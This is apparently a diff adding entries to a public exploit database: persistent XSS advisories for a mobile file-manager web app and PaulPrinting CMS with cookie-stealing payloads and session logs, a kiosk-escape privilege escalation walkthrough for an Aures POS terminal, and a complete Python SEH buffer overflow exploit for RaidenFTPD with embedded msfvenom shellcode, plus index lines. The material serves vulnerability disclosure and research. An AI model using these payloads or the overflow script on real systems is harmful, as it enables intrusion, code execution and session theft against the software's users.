+<td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
+<td align="center">2022/07/17 20:10</td>
+<td class="td-manage" style="border-right-width:1px;text-align:center;">
+<a title="Copy" onclick="copy(3)" href="javascript:;">
+<i class="iconfont">&nbsp;&nbsp;</i>
+</a>
+<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
+<i class="layui-icon">&nbsp;&nbsp;</i>
+</a></td></tr></tbody></table>
+
+
+
+--- PoC Session Logs #1 (POST) --- (Add)
+http://localhost:8080/file_action
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 210
+Origin:http://localhost:8080
+Connection: keep-alive
+Referer:http://localhost:8080/webile_files
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
+-
+POST: HTTP/1.1 200 OK
+Content-Type: application/json
+Connection: keep-alive
+Content-Encoding: gzip
+Transfer-Encoding: chunked
+-
+http://localhost:8080/evil.source
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:http://localhost:8080/webile_files
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Content-Type: application/octet-stream
+Connection: keep-alive
+Content-Length: 0
+-
+Cookie:
+treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+
+
+
+--- PoC Session Logs #2 (POST) --- (Send)
+http://localhost:8080/send
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 180
+Origin:http://localhost:8080
+Connection: keep-alive
+Referer:http://localhost:8080/webile_send
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
+-
+POST: HTTP/1.1 200 OK
+Content-Type: application/json
+Connection: keep-alive
+Content-Encoding: gzip
+Transfer-Encoding: chunked
+-
+http://localhost:8080/evil.source
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:http://localhost:8080/webile_send
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Content-Type: application/octet-stream
+Date: Sun, 17 Jul 2022 18:08:33 GMT
+Connection: keep-alive
+Content-Length: 0
+
+
+Security Risk:
+==============
+The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.

exploits/php/webapps/51617.txt

@@ -0,0 +1,185 @@
+Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2323
+
+
+Release Date:
+=============
+2023-07-17
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2323
+
+
+Common Vulnerability Scoring System:
+====================================
+7.2
+
+
+Vulnerability Class:
+====================
+Privilege Escalation
+
+
+Current Estimated Price:
+========================
+3.000€ - 4.000€
+
+
+Product & Service Introduction:
+===============================
+KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or
+freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk
+features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.
+With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to
+manage customer cards and promotions. Queue management can also be optimized.
+
+(Copy of the Homepage:https://aures.com/de/komet/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of
+the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.
+
+
+Affected Product(s):
+====================
+Aures Technologies GmbH
+Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2023-05-09: Researcher Notification & Coordination (Security Researcher)
+2023-07-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Open Authentication (Anonymous Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal
+(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers
+to bypass the kiosk mode to compromise the local file system and applications.
+
+It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are
+able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security
+vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local
+privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate
+local file-system information of the compromised windows based operating system.
+
+No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system
+vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.
+
+Vulnerable Operating System(s):
+[+] Windows 10 (IoT Enterprise)
+
+Affected Component(s):
+[+] Context Menu
+
+Affected Function(s):
+[+] Web Search
+[+] Share (Teilen)
+
+
+Proof of Concept (PoC):
+=======================
+The local vulnerability can be exploited by local attackers with physical device access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Sheet
+Touch Display => Select Food Item => Highlight Text
+=> Open Context Menu => Extend Context Menu => Web-Search
+=> Browser => Local File System => Compromised!
+
+
+Manual steps to reproduce the vulnerability ...
+01. First touch the monitor display to move on from standby
+02. Select an food item from the menu of immergrün (we recomment the cesar wraps)
+03. Push the information button of the selected food item
+04. Push twice via touch to mark the selected food item text
+05. Press a third time after you have marked the context by holding it down on the touch display
+06. Now the function context menu of the operating system for highlighted text appears
+07. On the context menu appearing 3 dots to extend the visible function menu
+08. Select the web-search or share function for the highlighted content in the context menu
+09. The browser of the operating system opens on the main front screen
+10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)
+10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)
+10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)
+10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)
+10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)
+10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols
+10.7 Attackers are able to perform man in the middle attacks from the local computer system
+11.0 Successful reproduce of the security vulnerability!
+
+
+Reference(s): Pictures
+- 1.png (Terminal A)
+- 2.png (Terminal B)
+- 3.png (Escape)
+- 4.png (Awareness)
+
+
+Solution - Fix & Patch:
+=======================
+The security vulnerabilities can be patched by following steps:
+1. Disable the content menu to extend
+2. Disable the context menu
+3. Disable web-search
+4. Disable to mark text inputs & texts
+5. Disallow to open not white listed websites
+6. Disable to download files
+7. Restrict the web-browser access
+8. Disallow the file browser
+9. Disable the browser debug modus
+10. Reconfigure the local firewall to allow and disallow connections
+11. Change the access permission to prevent exfiltration
+
+
+Security Risk:
+==============
+The security risk of the vulnerability in the local booking and payment terminal system is considered high.
+The issue can be easily exploited by local attackers with simple interaction via the touch display.
+Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse
+it for further simple or more complex attack scenarios.
+
+
+Credits & Authors:
+==================
+Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
+Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther

exploits/php/webapps/51618.txt

@@ -0,0 +1,257 @@
+Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2285
+
+
+Release Date:
+=============
+2023-07-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2285
+
+
+Common Vulnerability Scoring System:
+====================================
+5.8
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
+
+(Copy of the Homepage:https://codecanyon.net/user/codepaul )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.
+
+
+Affected Product(s):
+====================
+CodePaul
+Product: PaulPrinting (2018) - CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-08-25: Researcher Notification & Coordination (Security Researcher)
+2022-08-26: Vendor Notification (Security Department)
+2022-**-**: Vendor Response/Feedback (Security Department)
+2022-**-**: Vendor Fix/Patch (Service Developer Team)
+2022-**-**: Security Acknowledgements (Security Department)
+2023-07-19: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.
+After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins
+in the backend (listing).
+
+The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own
+malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in
+the backend (listing).
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] /printing/register
+[+] /account/delivery
+
+Vulnerable Input(s):
+[+] First name
+[+] Last name
+[+] Address
+[+] City
+[+] State
+
+Vulnerable Parameter(s):
+[+] firstname
+[+] lastname
+[+] address
+[+] city
+[+] state
+
+Affected Module(s):
+[+] Frontend Settings (./printing/account/setting)
+[+] Frontend Delivery Address (./printing/account/delivery)
+[+] Backend User Preview Listing
+[+] Backend Delivery Address Contact Review
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open your browser and start a http session tamper
+2. Register in the application by login click to register
+3. Inject to the marked vulnerable input fields your test payload
+4. Save the entry by submit via post method
+5. Login to the account and preview the settings
+Note: Administrators in the backend have the same wrong validated context that executes on preview of users
+6. The script code executes on preview of the profile - settings
+7. Successful reproduce of the first vulnerability!
+8. Followup by opening the Delivery address module
+9. Add a contact and add in the same vulnerable marked input fields your test payload
+Note: T he script code executes on each review of the address in the backend or user frontend
+10. Successful reproduce of the second vulnerability!
+
+
+Exploitation: Payload
+"<iframe src=evil.source onload(alert(document.cookie)>
+"<iframe src=evil.source onload(alert(document.domain)>
+
+
+--- PoC Session Logs (POST) ---
+https://paulprinting.localhost:8000/printing/account/setting
+Host: paulprinting.localhost:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 357
+Origin:https://paulprinting.localhost:8000
+Connection: keep-alive
+Referer:https://paulprinting.localhost:8000/printing/account/setting
+Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
+POST:
+title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
+&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
+&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
+&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
+&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
+&zipcode=2342&country=BS&phone=23523515235235&save=Save
+-
+POST: HTTP/3.0 302 Found
+content-type: text/html; charset=UTF-8
+x-powered-by: PHP/7.1.33
+location:https://paulprinting.localhost:8000/printing/account/setting?save=1
+-
+https://paulprinting.localhost:8000/printing/account/setting?save=1
+Host: paulprinting.localhost:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer:https://paulprinting.localhost:8000/printing/account/setting
+Connection: keep-alive
+Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
+-
+POST: HTTP/3.0 200 OK
+content-type: text/html; charset=UTF-8
+x-powered-by: PHP/7.1.33
+
+
+Vulnerable Source: Your Account - Settings
+<div class="form-group row">
+<label class="col-sm-4 col-form-label">First name</label>
+<div class="col-sm-8">
+<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">
+</div></div>
+<label class="col-sm-4 col-form-label">Last name</label>
+<div class="col-sm-8">
+<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">
+</div></div>
+<div class="form-group row">
+<label class="col-sm-4 col-form-label">Address</label>
+<div class="col-sm-8">
+<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">
+</div></div>
+<div class="form-group row">
+<label class="col-sm-4 col-form-label">City</label>
+<div class="col-sm-8">
+<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">
+</div></div>
+<div class="form-group row">
+<label class="col-sm-4 col-form-label">State</label>
+<div class="col-sm-8">
+<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">
+</div></div>
+
+
+Vulnerable Source: Deliery Contact (Address)
+<table class="table">
+<thead>
+<tr>
+<th>Contact</th>
+<th>Address</th>
+<th>City</th>
+<th>State</th>
+<th>Country</th>
+<th></th>
+</tr>
+</thead>
+<tbody><tr>
+<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
+<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
+<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
+<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
+<td></td>
+<td class="text-right">
+<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
+<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a>
+</td></tr></tbody>
+</table>
+
+
+Security Risk:
+==============
+The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

exploits/windows/local/51611.py

@@ -0,0 +1,59 @@
+# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
+# Date: 18/07/2023
+# Exploit Author: Andre Nogueira
+# Vendor Homepage: https://www.raidenftpd.com/en/
+# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
+# Version: RaidenFTPD 2.4.4005
+# Tested on: Microsoft Windows 10 Build 19045
+
+# 1.- Open RaidenFTPD
+# 2.- Click on 'Setup' -> 'Step by step setup wizard'
+# 3.- Run python code: exploit-raidenftpd.py
+# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
+# 5.- Click 'next' -> 'next' -> 'ok'
+# 6.- Pop calc.exe
+
+
+#!/usr/bin/env python3
+from struct import pack
+
+crash = 2000
+offset = 497
+
+# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d"
+shellcode =  b"\x90" * 8
+shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
+shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
+shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
+shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
+shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
+shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
+shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
+shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
+shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
+shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
+shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
+shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
+shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
+shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
+shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
+shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
+shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
+shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
+shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
+shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"
+
+nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes
+SEH = pack("<L", 0x7c1e76ff) #  pop eax; pop esi; ret; => msvcp70.dll
+
+buffer = b"A" * offset
+buffer += nSEH
+buffer += SEH
+buffer += shellcode
+buffer += b"D" * (crash -len(buffer))
+
+file_payload = open("exploit-raiden.txt", 'wb')
+print("[*] Creating the .txt file for out payload")
+file_payload.write(buffer)
+print("[*] Writing malicious payload to the .txt file")
+file_payload.close()

files_exploits.csv

@@ -11040,6 +11040,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19686,exploits/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",remote,multiple,,1999-12-22,2012-07-08,1,CVE-2000-0028;OSVDB-7903,,,,,https://www.securityfocus.com/bid/887/info
 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
+51609,exploits/multiple/remote/51609.txt,"Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.",2023-07-20,nu11secur1ty,remote,multiple,,2023-07-20,2023-07-20,0,CVE-2023-33148,,,,,
 51538,exploits/multiple/remote/51538.txt,"Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing",2023-06-22,nu11secur1ty,remote,multiple,,2023-06-22,2023-06-22,0,,,,,,
 51574,exploits/multiple/remote/51574.txt,"Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution",2023-07-07,nu11secur1ty,remote,multiple,,2023-07-07,2023-07-07,0,CVE-2023-33131,,,,,
 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
@@ -12106,6 +12107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
+51619,exploits/multiple/webapps/51619.txt,"RWS WorldServer 11.7.3 - Session Token Enumeration",2023-07-20,"RedTeam Pentesting GmbH",webapps,multiple,,2023-07-20,2023-07-20,0,CVE-2023-38357,,,,,
 47005,exploits/multiple/webapps/47005.txt,"Sahi pro 7.x/8.x - Directory Traversal",2019-06-18,"Goutham Madhwaraj",webapps,multiple,,2019-06-18,2019-06-18,0,CVE-2018-20470,,,,,
 47007,exploits/multiple/webapps/47007.txt,"Sahi pro 8.x - Cross-Site Scripting",2019-06-18,"Goutham Madhwaraj",webapps,multiple,,2019-06-18,2019-07-12,0,CVE-2018-20472,,,,http://www.exploit-db.cominstall_sahi_pro_v800_20181031.jar,
 47062,exploits/multiple/webapps/47062.py,"Sahi pro 8.x - Directory Traversal",2019-07-01,Operat0r,webapps,multiple,,2019-07-01,2020-03-09,0,CVE-2019-13063,Traversal,,,http://www.exploit-db.cominstall_sahi_pro_v800_20181031.jar,
@@ -14282,6 +14284,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5319,exploits/php/webapps/5319.pl,"AuraCMS 2.x - '/user.php' Security Code Bypass / Arbitrary Add Administrator",2008-03-28,NTOS-Team,webapps,php,,2008-03-27,2016-10-26,1,OSVDB-43963;CVE-2008-1715,,,,,
 33555,exploits/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",webapps,php,,2014-05-28,2014-05-31,1,OSVDB-107554;CVE-2014-3974;CVE-2014-3975,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-05-31-at-151915.png,http://www.exploit-db.comAuraCMS.zip,
 4254,exploits/php/webapps/4254.txt,"AuraCMS Forum Module - SQL Injection",2007-08-05,k1tk4t,webapps,php,,2007-08-04,,1,OSVDB-36432;CVE-2007-4171,,,,,
+51617,exploits/php/webapps/51617.txt,"Aures Booking & POS Terminal - Local Privilege Escalation",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 10609,exploits/php/webapps/10609.txt,"Aurora CMS - SQL Injection",2009-12-22,Sora,webapps,php,,2009-12-21,,0,,,,,,
 9656,exploits/php/webapps/9656.txt,"Aurora CMS 1.0.2 - 'install.plugin.php' Remote File Inclusion",2009-09-14,"EA Ngel",webapps,php,,2009-09-13,,1,OSVDB-58124;CVE-2009-3365,,,,,
 12155,exploits/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",webapps,php,,2010-04-10,,0,,,,,,
@@ -15013,6 +15016,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25735,exploits/php/webapps/25735.txt,"BookReview 1.0 - 'suggest_review.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,webapps,php,,2005-05-26,2013-05-27,1,CVE-2005-1782;OSVDB-16879,,,,,https://www.securityfocus.com/bid/13783/info
 11402,exploits/php/webapps/11402.txt,"Books/eBooks Rental Software - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-10,,1,OSVDB-62277;CVE-2010-0761,,,,,
 17943,exploits/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,webapps,php,,2011-10-08,2011-10-08,0,OSVDB-83480,,,,http://www.exploit-db.combooksolved_v1.2.2.zip,
+51612,exploits/php/webapps/51612.txt,"Boom CMS v8.0.7 - Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 29097,exploits/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,webapps,php,,2006-11-20,2013-10-21,1,,,,,,https://www.securityfocus.com/bid/21182/info
 2575,exploits/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,webapps,php,,2006-10-15,,1,,,,,,
 36244,exploits/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",webapps,php,,2011-10-19,2016-12-13,1,,,,,,https://www.securityfocus.com/bid/50286/info
@@ -25517,6 +25521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",2021-09-06,a-rey,webapps,php,,2021-09-06,2021-10-22,0,,,,,,
 27634,exploits/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,webapps,php,,2006-04-12,2013-08-17,1,CVE-2006-1783;OSVDB-31440,,,,,https://www.securityfocus.com/bid/17495/info
 44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,,2018-05-24,2018-05-24,0,,,,,,
+51618,exploits/php/webapps/51618.txt,"PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
 42156,exploits/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,webapps,php,,2017-06-11,2017-06-11,0,,,,,,
 42359,exploits/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",webapps,php,,2017-07-24,2017-07-24,0,,,,,,
@@ -25639,6 +25644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443,2016-04-18,2016-04-18,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.6-RELEASE-i386.iso.gz,http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
 39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443,2016-01-25,2016-04-14,0,OSVDB-132268,,,,http://www.exploit-db.compfsense-RELENG_2_2_5.tar.gz,
 39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443,2016-04-14,2016-04-14,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz,
+51608,exploits/php/webapps/51608.rb,"pfSense v2.7.0 - OS Command Injection",2023-07-20,"Emir Polat",webapps,php,,2023-07-20,2023-07-20,0,CVE-2023-27253,,,,,
 43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15969,,,,,
 22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php,,2012-10-31,2012-10-31,0,OSVDB-86857;OSVDB-86856;OSVDB-86855,,,,,https://www.vulnerability-lab.com/get_content.php?id=736
